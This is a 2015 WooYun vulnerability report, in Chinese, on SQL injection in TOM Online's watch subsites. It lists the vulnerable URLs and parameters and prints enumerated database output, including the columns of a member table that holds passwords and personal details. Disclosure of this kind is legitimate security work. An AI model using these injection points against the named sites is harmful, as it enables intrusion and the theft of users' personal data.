当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0143844

漏洞标题:TOM在线分站几处SQL注入漏洞用户信息泄露

相关厂商:TOM在线

漏洞作者: 憋屈

提交时间:2015-09-28 12:29

修复时间:2015-10-11 21:30

公开时间:2015-10-11 21:30

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-28: 细节已通知厂商并且等待厂商处理中
2015-10-11: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

TOM的洞都被忽略了,,

详细说明:

http://iwatchome.tom.com/Wiki_style.php?w2_id=261&page=1 w2_id=261
http://iwatchome.tom.com/Wiki_style_content.php?keyword=&w3_id=7 w3_id=7
http://iwatch.tom.com/Wiki_style.php?w2_id=261&page=1 w2_id=261

tom1.png

漏洞证明:

Database: iwatchome_cn
[50 tables]
+---------------+
| ACCOUNT |
| AD |
| AD_LOG |
| AD_SP |
| AREA |
| ARTICLE |
| ARTICLE_LOG |
| ARTICLE_RE |
| AUTHOR |
| BOOK |
| BOOK_LOG |
| BRAND |
| BRAND_BAK |
| BRAND_SERIES |
| COLLECT |
| EXAM |
| HOME_ROW |
| HOT_WATCH |
| KWORD |
| LOGS |
| MEMBER |
| MEMBER_bak |
| META_DEF |
| NEWS |
| NEW_ARRIVAL |
| PAGE_LOG |
| PRG_PRIV |
| SP_STATUS |
| STORE |
| STORE_BAK |
| STORE_BRAND |
| STORE_LOG |
| STUFF_KWORD |
| STUFF_PIC |
| STUFF_PIC_OLD |
| TALK |
| TALK_B |
| TALK_BAK |
| TALK_RE |
| TALK_RE_BAK |
| TICKET |
| VIDEO |
| WATCH |
| WATCH_LOG |
| WATCH_OLD |
| WATCH_TODAY |
| WIKI1 |
| WIKI2 |
| WIKI3 |
| test |
+---------------+
Database: iwatchome_cn
Table: MEMBER
[34 columns]
+---------------+--------------+
| Column | Type |
+---------------+--------------+
| ADDRESS | varchar(80) |
| BIRTHDAY | date |
| CELLPHONE | varchar(12) |
| COUNTY | varchar(10) |
| CREATOR | varchar(50) |
| CTIME | datetime |
| EDM | char(1) |
| EMAIL | varchar(50) |
| FACEBOOK | varchar(30) |
| GOOGLE | varchar(30) |
| GRADE | char(1) |
| IMG_FILE | varchar(200) |
| IMG_SHOW | varchar(1) |
| LAST_LOGON | datetime |
| LOGIN_COUNT | int(11) |
| MEMBER_ID | varchar(100) |
| MODIFIER | varchar(50) |
| MTIME | datetime |
| NAME | varchar(20) |
| NOTES | text |
| OCCUPATION_ID | varchar(2) |
| PASSWORD | varchar(50) |
| POINT | int(11) |
| POST_CODE | varchar(5) |
| REGION | varchar(10) |
| RTIME | datetime |
| SEQNO | int(11) |
| SEX | char(1) |
| SIGN_FILE | varchar(100) |
| SIGN_SHOW | varchar(1) |
| SNAME | varchar(30) |
| STATUS | char(1) |
| TELE | varchar(15) |
| YAHOO | varchar(30) |
+---------------+--------------+
账号密码,地址,Facebook,Google,Yahoo账号,邮箱,电话号码等等泄露

tom2.png

修复方案:

版权声明:转载请注明来源 憋屈@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-10-11 21:30

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无